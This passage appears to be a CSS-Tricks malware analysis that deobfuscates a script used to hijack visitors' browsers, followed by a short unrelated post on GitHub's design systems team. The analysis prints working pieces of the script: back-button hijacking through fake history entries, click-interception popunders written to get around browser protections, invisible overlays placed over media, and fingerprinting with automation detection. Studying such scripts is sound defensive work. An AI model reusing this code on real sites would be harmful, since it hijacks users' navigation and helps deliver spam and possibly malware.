Remember the variable h0 above? It’s everywhere, used in statements like the following:

if (typeof w6D0[h0][H8] == M3) {

...which, after substitution, became:

if (typeof window['window'][H8] == M3) {

This is not much clearer than before, but still is a small step ahead from where I started. Similarly, the following line:

var p = w6D0[X0][H](d3);

...became this:

var p = window["document"][H](d3);

In the obfuscation technique used for this script, the names of variables that are local to a function are usually substituted with names with a single letter, like this:

function D9(O, i, p, h, j) {
  var Q = 'newWin.opener = null;',
      Z = 'window.parent = null;',
      u = ' = newWin;',
      N = 'window.parent.',
      w = '' + atob('Ig==') + ');',
      g = '' + atob('Ig==') + ', ' + atob('Ig==') + '',
      f = 'var newWin = window.open(' + atob('Ig==') + '',
      d = 'window.frameElement = null;',
      k = 'window.top = null;',
      r = 'text',
      l = 'newWin_',
      F = 'contentWindow',
      O9 = 'new_popup_window_',
      I = 'disableSafeOpen',
      i9 = e['indexOf']('MSIE') !== -'1';
  // more function code here
}

Most global variables names, however, have been substituted with names with multiple letters, and all these names are unique. This means that it was possible for me to substitute them globally all over the script.

There was another big bunch of global variables:

var W8 = 'plugins', f7 = 'startTimeout', z1 = 'attachEvent', b7 = 'mousemove', M1 = 'noScrollPlease',
    w7 = 'isOnclickDisabledInKnownWebView', a1 = 'notificationsUrl', g7 = 'notificationEnable', m8 = 'sliderUrl', T8 = 'interstitialUrl',
    v7 = '__interstitialInited', C8 = '%22%3E%3C%2Fscript%3E', O8 = '%3Cscript%20defer%20async%20src%3D%22', i8 = 'loading', p8 = 'readyState',
    y7 = '__pushupInited', o8 = 'pushupUrl', G7 = 'mahClicks', x7 = 'onClickTrigger', J7 = 'p',
    r7 = 'ppu_overlay', d7 = 'PPFLSH', I1 = 'function', H7 = 'clicksSinceLastPpu', k7 = 'clicksSinceSessionStart',
    s7 = 'lastPpu', l7 = 'ppuCount', t7 = 'seriesStart', e7 = 2592000000, z7 = 'call',
    Y1 = '__test', M7 = 'hostname', F1 = 'host', a7 = '__PPU_SESSION_ON_DOMAIN', I7 = 'pathname',
    Y7 = '__PPU_SESSION', F7 = 'pomc', V7 = 'ActiveXObject', q7 = 'ActiveXObject', c7 = 'iOSClickFix',
    m7 = 10802, D8 = 'screen',
    // ... and many more

I substituted all of those as well, with an automated script, and many of the functions became more intelligible. Some even became perfectly understandable without further work. A function, for example, went from this:

function a3() {
  var W = E;
  if (typeof window['window'][H8] == M3) {
    W = window['window'][H8];
  } else {
    if (window["document"][m7W.K2] && window["document"][m7W.K2][q5]) {
      W = window["document"][m7W.K2][q5];
    } else {
      if (window["document"][z] && window["document"][z][q5]) {
        W = window["document"][z][q5];
      }
    }
  }
  return W;
}

...to this:

function a3() {
  var W = 0;
  if (typeof window['window']['innerWidth'] == 'number') {
    W = window['window']['innerWidth'];
  } else {
    if (window["document"]['documentElement'] && window["document"]['documentElement']['clientWidth']) {
      W = window["document"]['documentElement']['clientWidth'];
    } else {
      if (window["document"]['body'] && window["document"]['body']['clientWidth']) {
        W = window["document"]['body']['clientWidth'];
      }
    }
  }
  return W;
}

As you can see, this function tries to determine the width of the client window, using all available cross-browser options. This might seem a bit overkill, since window.innerWidth is supported by all browsers starting from IE9.

window.document.documentElement.clientWidth, however, works even in IE6; this shows us that our script tries to be as cross-browser compatible as it can be. We’ll see more about this later.

Notice how, to obscure all of the property and function names used, this script makes heavy use of bracket notation, for example:

window['document']['createElement']('a')

...instead of:

window.document.createElement('a')
This allows the script to substitute the name of object methods and properties with random strings, which are then defined once — at the beginning of the script — with the proper method or property name. This makes the code very difficult to read, since you have to reverse all of the substitutions. It is obviously not only an obfuscation technique, however, since substituting long property names with one or two letters, if they occur often, can save quite a few bytes on the overall file size of the script and thus make it download faster.
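A tiny runnable sketch of the aliasing trick described above (a stub object stands in for window here, and the alias names are invented for illustration):

```javascript
// Stand-in object; in the real script this role is played by `window`
const win = { document: { title: 'demo page' } };

// Long property names are defined once, as short string constants...
const o2 = 'document', t = 'title';

// ...and every later access goes through bracket notation, so the
// property names appear only once in the whole file
const title = win[o2][t]; // equivalent to win.document.title
```

Minifying this way both hides the property names from a casual reader and shaves bytes off every repeated access.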

The end result of the last series of substitutions I performed made the code even clearer, but I was still left with a very long script with a lot of functions with unintelligible names, like this one:

function k9(W, O) {
  var i = 0, p = [], h;
  while (i < W.length) {
    h = O(W[i], i, W);
    if (h !== undefined) {
      p['push'](h);
    }
    i += '1';
  }
  return p;
}

All of them have variable declarations at the beginning of each function, most likely the result of the obfuscation/compression technique used on the original code. It is also possible that the writer(s) of this code were very scrupulous and declared all variables at the beginning of each function, but I have some doubts about that.

The k9 function above is used diffusely in the script, so it was among the first I had to tackle. It expects two arguments, W and O, and prepares a return variable (p), initialized as an empty array, as well as a temporary variable (h).

Then it cycles through W with a while loop:

while (i < W.length) {

This tells us that the W argument will be an array, or at least something traversable like an object or a string. It then supplies the current element in the loop, the current index of the loop, and the whole W argument as parameters to the initial O argument, which tells us the latter will be a function of some sort. It stores the result of the function’s execution in the temporary variable h:

h = O(W[i], i, W);

If the result of this function is not undefined, it gets appended to the result array p:

if (h !== undefined) { p['push'](h); }

The returned variable is p.

What kind of construct is this? It’s obviously a mapping/filter function but is not just mapping the initial object W, since it does not return all of its values, but rather selects some of them. It is also not only filtering them, because it does not simply check for true or false and return the original element. It is sort of a hybrid of both.

I had to rename this function, just like I did with most of the others, giving a name that was easy to understand and explained the purpose of the function.

Since this function is usually used in the script to transform the original object W in one way or another, I decided to rename it mapByFunction. Here it is, in its un-obfuscated glory:

function mapByFunction(myObject, mappingFunction) {
  var i = 0, result = [], h;
  while (i < myObject.length) {
    h = mappingFunction(myObject[i], i, myObject);
    if (h !== undefined) {
      result['push'](h);
    }
    i += 1;
  }
  return result;
}
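To see the map/filter hybrid in action, here it is standalone with a small usage example (the function is repeated so the snippet runs as-is; the mapping function is mine, for illustration):

```javascript
// Deciphered hybrid of Array.prototype.map and filter:
// results that are undefined are silently dropped
function mapByFunction(myObject, mappingFunction) {
  var i = 0, result = [], h;
  while (i < myObject.length) {
    h = mappingFunction(myObject[i], i, myObject);
    if (h !== undefined) {
      result.push(h);
    }
    i += 1;
  }
  return result;
}

// Example: double the even numbers, drop the odd ones in one pass
const doubledEvens = mapByFunction([1, 2, 3, 4], function (n) {
  return n % 2 === 0 ? n * 2 : undefined;
});
// doubledEvens is [4, 8]
```

Because the loop only checks `i < myObject.length`, it works equally well on arrays and on strings, which is exactly how the script later uses it to decode the options string character by character.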

A similar procedure had to be applied to all of the functions in the script, trying to guess one by one what they were trying to achieve, what variables were passed to them and what they were returning. In many cases, this involved going back and forth in the code when one function I was deciphering was using another function I hadn’t deciphered yet.

Some other functions were nested inside others, because they were used only in the context of the enclosing function, or because they were part of some third-party piece of code that had been pasted verbatim within the script.
At the end of all this tedious work, I had a big script full of fairly intelligible functions, all with nice descriptive (albeit very long) names.

Here are some of the names, from the Structure panel of my IDE:

List of deciphered functions with descriptive names.

Now that the functions have names, you can start guessing a few of the things this script is doing. Would any of you like to try to injectPDFAndDoStuffDependingOnChromeVersion in someone’s browser now?

Structure of the script

Once the individual functions comprising the script had been deciphered, I tried to make a sense of the whole.

The script at the beginning is made out of a lot of helper functions, which often call other functions, and sometimes set variables in the global scope (yuck!). Then the main logic of the script begins, around line 1,680 of my un-obfuscated version.

The script can behave very differently depending on the configuration that gets passed to it: a lot of functions check one or several parameters in the main options argument, like this:

if (options['disableSafeOpen'] || notMSIE) {
  // code here
}

Or like this:

if (!options['disableChromePDFPopunderEventPropagation']) {
  p['target']['click']();
}

But the options argument, if you remember, is encrypted. So the next thing to do was to decipher it.

Decrypting the configuration parameters

At the very beginning of the script’s main code, there’s this call:

// decode options
if (typeof options === 'string') {
  options = decodeOptions(options, lary);
}

decodeOptions is the name I gave to the function that performs the job. It was originally given the humble name g4.

Finally, we’re also using the mysteriouslary argument, whose value is:


The first half of the string is clearly the lowercase alphabet, followed by the numbers 0 through 9. The second half consists of random characters. Does that look like a cypher to you? If your answer is yes, you are damn right. It is, in fact, a simple substitution cypher, with a little twist.

The whole decodeOptions function looks like this:

function decodeOptions(Options, lary) {
  var p = ')',
      h = '(',
      halfLaryLength = lary.length / 2,
      firstHalfOfLary = lary['substr'](0, halfLaryLength),
      secondHalfOfLary = lary['substr'](halfLaryLength),
      w,
      // decrypts the option string before JSON parsing it
      g = mapByFunction(Options, function (W) {
        w = secondHalfOfLary['indexOf'](W);
        return w !== -1 ? firstHalfOfLary[w] : W;
      })['join']('');
  if (window['JSON'] && window['JSON']['parse']) {
    try {
      return window['JSON']['parse'](g);
    } catch (W) {
      return eval(h + g + p);
    }
  }
  return eval(h + g + p);
}

It first sets a couple of variables containing opening and closing parentheses, which will be used later:

var p = ')',
    h = '(',

Then it splits our lary argument in half:

halfLaryLength = lary.length / 2,
firstHalfOfLary = lary['substr'](0, halfLaryLength),
secondHalfOfLary = lary['substr'](halfLaryLength),

Next, it maps the Options string, letter by letter, with this function:

function (W) {
  w = secondHalfOfLary['indexOf'](W);
  return w !== -1 ? firstHalfOfLary[w] : W;
}

If the current letter is present in the second half of the lary argument, it returns the corresponding letter in the lower-case alphabet in the first part of the same argument. Otherwise, it returns the current letter, unchanged. This means that the options parameter is only half encrypted, so to say.
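In miniature, the whole decode step works like this (both alphabet halves are made up here; the real lary is a-z0-9 followed by 36 scrambled characters):

```javascript
// Toy cipher string: plain characters on the left, their substitutes
// on the right ('a' is written as 'x', 'b' as 'y', 'c' as 'z')
const lary = 'abc' + 'xyz';

function decodeToy(encoded, lary) {
  const half = lary.length / 2;
  const firstHalf = lary.substr(0, half);  // plain characters
  const secondHalf = lary.substr(half);    // cipher characters
  return encoded.split('').map(function (ch) {
    const i = secondHalf.indexOf(ch);
    return i !== -1 ? firstHalf[i] : ch;   // unknown chars pass through
  }).join('');
}

const decoded = decodeToy('zyx{', lary);
// 'z' -> 'c', 'y' -> 'b', 'x' -> 'a', '{' passes through: 'cba{'
```

The pass-through branch is what makes the options string only "half encrypted": JSON punctuation like braces, quotes and colons survives the encoding untouched.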

Once the mapping has taken place, the resulting array of decrypted letters g (remember, mapByFunction always returns an array) is converted back to a string with ['join'](''), as seen on the last line of the mapping step in the function above.
The configuration is initially a JSON object, so the script tries to use the browser’s native JSON.parse function to turn it into an object literal. If the JSON object is not available (IE7 or lower, Firefox and Safari 3 or lower), it resorts to putting it between parentheses and evaluating it:

if (window['JSON'] && window['JSON']['parse']) {
  try {
    return window['JSON']['parse'](g);
  } catch (W) {
    return eval(h + g + p);
  }
}
return eval(h + g + p);

This is another case of the script being extremely cross-browser compatible, to the point of supporting browsers that are more than 10 years old. I’ll try and explain why in a while.
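The fallback hinges on wrapping the JSON text in parentheses so that eval parses {…} as an object literal rather than a statement block. A sketch with a made-up fragment of the decoded options:

```javascript
// Hypothetical miniature of the decoded options JSON text
const g = '{"aggressive":false,"ppuQnty":3}';

// Native JSON.parse when available; otherwise evaluate the text as an
// expression. Without the parentheses, eval would read the leading
// '{' as the start of a block and throw a syntax error.
const parsed = (typeof JSON !== 'undefined' && JSON.parse)
  ? JSON.parse(g)
  : eval('(' + g + ')');
```

That is exactly what the p and h parenthesis variables at the top of decodeOptions are for.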

So, now the options variable has been decrypted. Here it is in all its deciphered splendour, albeit with the original URLs omitted:

let options = {
  SS: true,
  adblockPopup: true,
  adblockPopupLink: null,
  adblockPopupTimeout: null,
  addOverlay: false,
  addOverlayOnMedia: true,
  aggressive: false,
  backClickAd: false,
  backClickNoHistoryOnly: false,
  backClickZone: null,
  chromePDFPopunder: false,
  chromePDFPopunderNew: false,
  clickAnywhere: true,
  desktopChromeFixPopunder: false,
  desktopPopunderEverywhere: false,
  desktopPopunderEverywhereLinks: false,
  disableChromePDFPopunderEventPropagation: false,
  disableOnMedia: false,
  disableOpenViaMobilePopunderAndFollowLinks: false,
  disableOpenViaMobilePopunderAndPropagateEvents: false,
  disablePerforamnceCompletely: false,
  dontFollowLink: false,
  excludes: [],
  excludesOpenInPopunder: false,
  excludesOpenInPopunderCapping: null,
  expiresBackClick: null,
  getOutFromIframe: false,
  iOSChromeSwapPopunder: false,
  iOSClickFix: true,
  iframeTimeout: 30000,
  imageToTrackPerformanceOn: "", /* URL OMITTED */
  includes: [],
  interstitialUrl: "", /* URL OMITTED */
  isOnclickDisabledInKnownWebView: false,
  limLo: false,
  mahClicks: true,
  mobilePopUpTargetBlankLinks: false,
  mobilePopunderTargetBlankLinks: false,
  notificationEnable: false,
  openPopsWhenInIframe: false,
  openViaDesktopPopunder: false,
  openViaMobilePopunderAndPropagateFormSubmit: false,
  partner: "pa",
  performanceUrl: "", /* URL OMITTED */
  pomc: false,
  popupThroughAboutBlankForAdBlock: false,
  popupWithoutPropagationAnywhere: false,
  ppuClicks: 0,
  ppuQnty: 3,
  ppuTimeout: 25,
  prefetch: "",
  resetCounters: false,
  retargetingFrameUrl: "",
  scripts: [],
  sessionClicks: 0,
  sessionTimeout: 1440,
  smartOverlay: true,
  smartOverlayMinHeight: 100,
  smartOverlayMinWidth: 450,
  startClicks: 0,
  startTimeout: 0,
  url: "", /* URL OMITTED */
  waitForIframe: true,
  zIndex: 2000,
  zoneId: 1628975
}

I found the fact that there is an aggressive option very interesting, even though this option is unfortunately not used in the code. Given all the things this script does to your browser, I was very curious what it would have done had it been more "aggressive."

Not all of the options passed to the script are actually used in the script; and not all of the options the script checks are present in the options argument passed in this version of it. I assume that some of the options that are not present in the script’s configuration are used in versions deployed onto other sites, especially for cases in which this script is used on multiple domains. Some options might also be there for legacy reasons and are simply not in use anymore. The script has some empty functions left in, which likely used some of the missing options.

What does the script actually do?

Just by reading the name of the options above, you can guess a lot of what this script does: it will open a smartOverlay, even using a special adblockPopup. If you clickAnywhere, it will open a url. In our specific version of the script, it will not openPopsWhenInIframe, and it will not getOutFromIframe, even though it will apply an iOSClickFix. It will count popups and save the value in ppuCount, and even track performance using an imageToTrackPerformanceOn (which I can tell you, even if I omitted the URL, is hosted on a CDN). It will track ppuClicks (pop up clicks, I guess), and cautiously limit itself to a ppuQnty (likely a pop up quantity).

By reading the code, I could find out a lot more, obviously. Let’s see what the script does and follow its logic. I will try to describe all of the interesting things it can do, including those that are not triggered by the set of options I was able to decipher.

The main purpose of this script is to direct the user to a URL that is stored in its configuration as options['url']. The URL in the configuration I found redirected me to a very spammy website, so I will refer to this URL as the Spammy Site from now on, for the sake of clarity.

1. I want to get out of this iFrame!

The first thing this script does is try to get a reference to the top window if the script itself is run from within an iFrame. If the current configuration requires it, it sets that as the main window to operate on, and sets all references to the document element and user agent to those of the top window:

if (options['getOutFromIframe'] && iframeStatus === 'InIframeCanExit') {
  while (myWindow !== myWindow.top) {
    myWindow = myWindow.top;
  }
  myDocument = myWindow['document'];
  myDocumentElement = myWindow['document']['documentElement'];
  myUserAgent = myWindow['navigator']['userAgent'];
}

2. What’s your browser of choice?

The second thing it does is a very minute detection of the current browser, browser version and operating system by parsing the user agent string. It detects if the user is using Chrome and its specific version, Firefox, Firefox for Android, UC Browser, Opera Mini, Yandex, or if the user is using the Facebook app. Some checks are very specific:

isYandexBrowser = /YaBrowser/['test'](myUserAgent),
isChromeNotYandex = chromeVersion && !isYandexBrowser,

We’ll see why later.

3. All your browser are belong to us

Original meme here.

The first disturbing thing the script does is check for the presence of the history.pushState() function and, if it is present, inject a fake history entry with the current URL’s title. This allows it to intercept back click events (using the popstate event) and send the user to the Spammy Site instead of the previous page they actually visited. If it hadn’t added a fake history entry first, this technique would not work.

function addBackClickAd(options) {
  if (options['backClickAd'] && options['backClickZone'] && typeof window['history']['pushState'] === 'function') {
    if (options['backClickNoHistoryOnly'] && window['history'].length > 1) {
      return false;
    }
    // pushes a fake history state with the current doc title
    window['history']['pushState']({exp: Math['random']()}, document['title'], null);
    var createdAnchor = document['createElement']('a');
    createdAnchor['href'] = options['url'];
    var newURL = 'http://' + createdAnchor['host'] + '/afu.php?zoneid=' + options['backClickZone'] + '&var=' + options['zoneId'];
    setTimeout(function () {
      window['addEventListener']('popstate', function (W) {
        window['location']['replace'](newURL);
      });
    }, 0);
  }
}

This technique is used only outside the context of an iFrame, and not on Chrome iOS and UC Browser.
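One detail worth isolating from addBackClickAd is how the redirect URL is assembled from the host of the script's own spammy URL. A sketch with hypothetical values, using Node's URL class in place of the throwaway <a> element the script creates just to parse options['url']:

```javascript
// Hypothetical values; the real ones come from the decrypted options
const options = {
  url: 'http://spammy.example/landing',
  backClickZone: '42',
  zoneId: 1628975
};

// The script sets an anchor's href and reads back its .host property;
// the WHATWG URL class does the same parsing outside a browser
const host = new URL(options.url).host;
const newURL = 'http://' + host + '/afu.php?zoneid=' +
  options.backClickZone + '&var=' + options.zoneId;
// newURL: 'http://spammy.example/afu.php?zoneid=42&var=1628975'
```

So the back button doesn't even take you to the Spammy Site's landing page directly: it goes through a dedicated afu.php endpoint tagged with zone IDs, presumably for attribution.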

4. This browser needs more scripts

As if one malicious script were not enough, this one tries to inject more scripts, depending on its configuration. All of them are appended to the <head> of the document, and may include something called an Interstitial, a Slider, or a Pushup, all of which I assume are various forms of intrusive ads shown to the user. I couldn't verify this because, in our script's case, the configuration didn't contain any of them, apart from one whose URL was dead when I checked it.

5. Attack of the click interceptor

Next, the script attaches a "click interceptor" function to all types of click events on the document, including touch events on mobile. This function intercepts all user clicks or taps on the document, and proceeds to open different types of pop-ups, using different techniques depending on the device.

In some cases it tries to open a "popunder." This means it intercepts any click on a link, reads the link's original destination, opens that link in the current window, and simultaneously opens a new window with the Spammy Site in it. In most cases, it then restores focus to the original window rather than the new one. I think this is meant to circumvent browser security measures that check whether a script is redirecting URLs the user has actually clicked. The user ends up with the correct link open, but with another tab containing the Spammy Site, which they will sooner or later see when switching tabs.

In other cases, the script does the opposite and opens a new window with the link the user has clicked on, but changes the current window’s URL to that of the Spammy Site.
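Stripped of obfuscation and browser-specific branches, the popunder idea might be sketched like this. This is a hypothetical reconstruction, not the script's own code:

```javascript
// Hypothetical sketch of the basic popunder flow (my reconstruction):
// open the Spammy Site in a new window, refocus the original window,
// then follow the link the user actually clicked.
function popunder(event, spammySiteUrl) {
  var link = event.target.closest('a');
  if (!link) return;
  event.preventDefault();
  // Open the Spammy Site in a new tab/window...
  var popup = window.open(spammySiteUrl, '_blank');
  // ...but immediately give focus back to the original window
  if (popup) window.focus();
  // Finally, navigate the current window to the link's real destination
  window.location.href = link.href;
}
```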

To do all this, the script has different functions for different browsers, each presumably written to circumvent that particular browser's security measures, as well as AdBlock if it is present. Here is some of the code doing this to give you an idea:

if (options['openPopsWhenInIframe'] && iframeStatus === 'InIframeCanNotExit') {
  if (isIphoneIpadIpod && (V || p9)) {
    return openPopunder(W);
  }
  return interceptEventAndOpenPopup(W);
}
if (options['adblockPopup'] && currentScriptIsApuAfuPHP) {
  return createLinkAndTriggerClick(options['adblockPopupLink'], options['adblockPopupTimeout']);
}
if (options['popupThroughAboutBlankForAdBlock'] && currentScriptIsApuAfuPHP) {
  return openPopup();
}
if (!isIphoneIpadIpodOrAndroid && (options['openViaDesktopPopunder'] || t)) {
  if (isChromeNotYandex && chromeVersion > 40) {
    return injectPDFAndDoStuffDependingOnChromeVersion(W);
  }
  if (isSafari) {
    return openPopupAndBlank(W);
  }
  if (isYandexBrowser) {
    return startMobilePopunder(W, I);
  }
}
/* THERE ARE SEVERAL MORE LINES OF THIS KIND OF CODE */

To give you an example of a browser-specific behavior, the script opens a new window with the Spammy Site in it on Safari for Mac, immediately opens a blank window, gives that focus and then immediately closes it:

function openPopupAndBlank(W) {
  var O = 'about:blank';
  W['preventDefault']();
  // opens popup with options URL
  safeOpen(
    options['url'],
    'ppu' + new Date()['getTime'](),
    ['scrollbars=1', 'location=1', 'statusbar=1', 'menubar=0', 'resizable=1', 'top=0', 'left=0', 'width=' + window['screen']['availWidth'], 'height=' + window['screen']['availHeight']]['join'](','),
    document,
    function () {
      return window['open'](options['url']);
    }
  );
  // opens a blank window, gives it focus and closes it (??)
  var i = window['window']['open'](O);
  i['focus']();
  i['close']();
}

After setting up click interception, it creates a series of "smartOverlays." These are layers using transparent GIFs for a background image, which are positioned above each of the <object>, <iframe>, <embed>, <video> and <audio> tags that are present in the original document, and cover them completely. This is meant to intercept all clicks on any media content and trigger the click interceptor function instead:

if (options['smartOverlay']) {
  var f = [];
  (function d() {
    var Z = 750,
        affectedTags = 'object, iframe, embed, video, audio';
    mapByFunction(f, function (W) {
      if (W['parentNode']) {
        W['parentNode']['removeChild'](W);
      }
    });
    f = mapByFunction(safeQuerySelectorAll(affectedTags), function (W) {
      var O = 'px';
      if (!checkClickedElementTag(W, true)) {
        return;
      }
      if (flashPopupId && W['className'] === flashPopupId) {
        return;
      }
      if (options['smartOverlayMinWidth'] <= W['offsetWidth'] && options['smartOverlayMinHeight'] <= W['offsetHeight']) {
        var Q = getElementTopAndLeftPosition(W);
        return createNewDivWithGifBackgroundAndCloneStylesFromInput({
          left: Q['left'] + O,
          top: Q.top + O,
          height: W['offsetHeight'] + O,
          width: W['offsetWidth'] + O,
          position: 'absolute'
        });
      }
    });
    popupTimeOut2 = setTimeout(d, Z);
  })();
}

This way, the script is able to even intercept clicks on media objects that might not trigger standard "click" behaviors in JavaScript.

The script tries to do another couple of strange things. For example, on mobile devices, it scans for links that point to a blank window and attempts to intercept them with a custom function. The function even temporarily manipulates the rel attribute of the links, setting it to a value of 'noopener noreferer' before opening the new window. That is a strange thing to do, since this is supposedly a security measure for some older browsers. The idea may have been to avoid performance hits to the main page if the Spammy Site consumes too many resources and clogs the original page (something Jake Archibald explains here). However, this technique is used exclusively in this function and nowhere else, making it a bit of a mystery to me.
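A hedged reconstruction of that rel-swapping step might look like this. The function name and flow are mine; only the 'noopener noreferer' value (misspelling included) comes from the script itself:

```javascript
// Hypothetical sketch of the rel-swapping step (my reconstruction):
// force rel="noopener noreferer" so the new window can't reach back
// through window.opener, let the browser open it, then restore the link.
function openViaLink(link) {
  var originalRel = link.getAttribute('rel');
  var originalTarget = link.getAttribute('target');
  link.setAttribute('rel', 'noopener noreferer');
  link.setAttribute('target', '_blank');
  // Let the browser itself open the new window by re-triggering the click
  link.click();
  // Restore the link's original attributes afterwards
  if (originalRel === null) link.removeAttribute('rel');
  else link.setAttribute('rel', originalRel);
  if (originalTarget === null) link.removeAttribute('target');
  else link.setAttribute('target', originalTarget);
}
```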

The other strange thing the script does is to try and create a new window and add an iFrame with a PDF string as its source. This new window is immediately positioned off screen and the PDF iFrame is removed in case of a change of focus or visibility of the page. In some cases, only after the PDF has been removed does the script redirect to the Spammy Site. This feature seems to only target Chrome and I haven’t been able to determine whether the PDF is malicious or not.

6. Tell me more about yourself

Lastly, the script proceeds to collect a lot of information about the browser, which will be appended to the URL of the Spammy Site. It checks the following:

  • if Flash is installed
  • the width and height of the screen, the current window, and the window’s position in respect to the screen
  • the number of iFrames in the top window
  • the current URL of the page
  • if the browser has plugins installed
  • if the browser is PhantomJs or Selenium WebDriver (presumably to check if the site is currently being visited by an automated browser of some sort, and probably do something less scary than usual since automated browsers are likely to be used by companies producing anti-virus software, or law enforcement agencies)
  • if the browser supports the sendBeacon method of the Navigator object
  • if the browser supports geolocation
  • if the script is currently running in an iFrame

It then adds these values to the Spammy Site’s URL, each encoded with its own variable. The Spammy Site will obviously use the information to resize its content according to the size of the browser window, and presumably also to adjust the level of the content’s maliciousness depending on whether the browser is highly vulnerable (for example, it has Flash installed) or is possibly an anti-spam bot (if it is detected as being an automated browser).
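As an illustration of that last step, here's a generic sketch of how collected values typically get appended to a URL as a query string. The parameter names below are invented; the real script uses its own encoded variables:

```javascript
// Generic sketch of appending collected fingerprint values to a target URL
// (parameter names are invented for illustration)
function buildTrackingUrl(baseUrl, info) {
  var params = Object.keys(info).map(function (key) {
    return encodeURIComponent(key) + '=' + encodeURIComponent(info[key]);
  });
  // Append with '?' or '&' depending on whether a query string already exists
  return baseUrl + (baseUrl.indexOf('?') === -1 ? '?' : '&') + params.join('&');
}
```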

After this, the script is done. It does quite a few interesting things, doesn’t it?

Techniques and cross-browser compatibility

Let’s look at a few of techniques the script generally uses and why it needs them.

Browser detection

When writing code for the web, avoiding browser detection is typically accepted as a best practice because it is an error-prone technique: user agent strings are very complicated to parse and they can change with time as new browsers are released. I personally avoid browser detection on my projects like the plague.
In this case, however, correct browser detection can mean the success or failure of opening the Spammy Site on the user’s computer. This is the reason why the script tries to detect the browser and OS as carefully as it can.
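For contrast, the robust alternative legitimate code relies on is feature detection: testing for the capability itself rather than guessing from the browser's name. The script's own sendBeacon check, for instance, amounts to something like this (an illustrative sketch, not the script's code):

```javascript
// Feature detection: test for the capability directly instead of
// parsing the user agent string (illustrative sketch)
function supportsSendBeacon(nav) {
  return typeof nav.sendBeacon === 'function';
}
```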

Browser compatibility

For the same reasons, the script uses a lot of cross-browser techniques to maximize compatibility. This might be a result of a very old script which has been updated many times over the years, while keeping all of the legacy code intact. But it might also be a case of trying to keep the script compatible with as many browsers as possible.

After all, for people who are possibly trying to install malware on unsuspecting users, a user who is browsing the web with a very outdated browser or even a newer browser with outdated plug-ins is much more vulnerable to attacks and is certainly a great find!

One example is the function the script uses to open new windows in all other functions, which I’ve renamed safeOpen:

// SAFE OPEN FOR MSIE
function safeOpen(URLtoOpen, popupname, windowOptions, myDocument, windowOpenerFunction) {
  var notMSIE = myUserAgent['indexOf']('MSIE') === -1;
  if (options['disableSafeOpen'] || notMSIE) {
    var W9 = windowOpenerFunction();
    if (W9) {
      try {
        W9['opener']['focus']();
      } catch (W) { }
      W9['opener'] = null;
    }
    return W9;
  } else {
    var t, c, V;
    if (popupname === '' || popupname == null) {
      popupname = 'new_popup_window_' + new Date()['getTime']();
    }
    t = myDocument['createElement']('iframe');
    t['style']['display'] = 'none';
    myDocument['body']['appendChild'](t);
    c = t['contentWindow']['document'];
    var p9 = 'newWin_' + new Date()['getTime']();
    V = c['createElement']('script');
    V['type'] = 'text/javascript';
    V['text'] = [
      'window.top = null;',
      'window.frameElement = null;',
      'var newWin = window.open(' + atob('Ig==') + '' + URLtoOpen + '' + atob('Ig==') + ', ' + atob('Ig==') + '' + popupname + '' + atob('Ig==') + ', ' + atob('Ig==') + '' + windowOptions + '' + atob('Ig==') + ');',
      'window.parent.' + p9 + ' = newWin;',
      'window.parent = null;',
      'newWin.opener = null;'
    ]['join']('');
    c['body']['appendChild'](V);
    myDocument['body']['removeChild'](t);
    return window[p9];
  }
}

Every time this function is called, it is passed another function that opens a new window (the last argument in the signature above, called windowOpenerFunction). That function is customized in each call depending on the specific needs of the current use case. However, if the script detects that it's running on Internet Explorer, and the disableSafeOpen option is not set to true, it resorts to a fairly convoluted method of opening the window using the other parameters (URLtoOpen, popupname, windowOptions, myDocument) instead of calling windowOpenerFunction. It creates an iFrame, inserts it into the current document, adds a JavaScript script node to that iFrame which opens the new window, and finally removes the iFrame it just created.

Catching all exceptions

Another way this script always stays on the safe side is to catch exceptions, in fear that they will cause errors that might block JavaScript execution. Every time it calls a function or method that is not 100% safe on all browsers, it does so by passing it through a function that catches exceptions (and handles them if passed a handler, even though I haven’t spotted a use case where the exception handler is actually passed). I’ve renamed the original function tryFunctionCatchException, but it could have easily been called safeExecute:

function tryFunctionCatchException(mainFunction, exceptionHandler) {
  try {
    return mainFunction();
  } catch (exception) {
    if (exceptionHandler) {
      return exceptionHandler(exception);
    }
  }
}

Where does this script lead?

As you’ve seen, the script is configurable to redirect the user to a specific URL (the Spammy Site) which must be compiled in the semi-encrypted option for each individual version of this script that is deployed. This means the Spammy Site can be different for every instance of this script. In our case, the target site was some sort of Ad Server serving different pages, presumably based on an auction (the URL contained a parameter called auction_id).

When I first followed the link, it redirected me to what indeed was a very spammy site: it was advertising get-rich-quick schemes based on online trading, complete with pictures of a guy sitting in what was implied to be the new Lamborghini he purchased by getting rich with said scheme. The target site even used Evercookie to track users.

I recently re-ran the URL a few times, and it has redirected me to:

  • a landing page belonging to a famous online betting company (which has been the official sponsor of at least one European Champions League finalist), complete with the usual "free betting credit"
  • several fake news sites, in Italian and in French
  • sites advertising "easy" weight-loss programs
  • sites advertising online cryptocurrency trading

This is a strange script, in some respect. It seems that it has been created to take total control of the user’s browser, and to redirect the user to a specific target page. Theoretically, this script could arbitrarily inject other malicious scripts like keyloggers, cryptominers, etc., if it chose to. This kind of aggressive behavior (taking control of all links, intercepting all clicks on videos and other interactive elements, injecting PDFs, etc.) seems more typical of a malicious script that has been added to a website without the website owner’s consent.

However, after more than a month since I first found it, the script (in a slightly different version) is still there on the original website. It limits itself to intercepting every other click, keeping the original website at least partially usable. It is not that likely that the website’s original owner hasn’t noticed the presence of this script given that it’s been around this long.

The other strange thing is that this script points to what is, in all respects, an ad bidding service, though one that serves very spammy clients. There is at least one major exception: the aforementioned famous betting company. Is this script a malicious script which has evolved into some sort of half-legitimate ad serving system, albeit a very intrusive one? The Internet can be a very complicated place, and very often things aren’t totally legitimate or totally illegal — between black and white there are always several shades of grey.

The only advice I feel I can give you after analyzing this script is this: the next time you feel the irresistible urge to watch a table tennis match online, go to a legitimate streaming service and pay for it. It will save you a lot of hassles.

The post Anatomy of a malicious script: how a website can take over your browser appeared first on CSS-Tricks.

Design Systems at GitHub

Css Tricks - Thu, 07/12/2018 - 6:53am

Here’s a nifty post by Diana Mounter all about the design systems team at GitHub that details how the team was formed, the problems they've faced and how they've adapted along the way:

When I started working at GitHub in late 2015, I noticed that there were many undocumented patterns, I had to write a lot of new CSS to implement designs, and that there weren’t obvious underlying systems connecting all the pieces together. I knew things could be better and I was enthusiastic about making improvements—I quickly discovered that I wasn’t the only one that felt this way. There were several folks working on efforts to improve things, but weren’t working together. With support from design leads, a group of us started to meet regularly to discuss improvements to Primer and prioritize work—this was the beginnings of the design systems team.

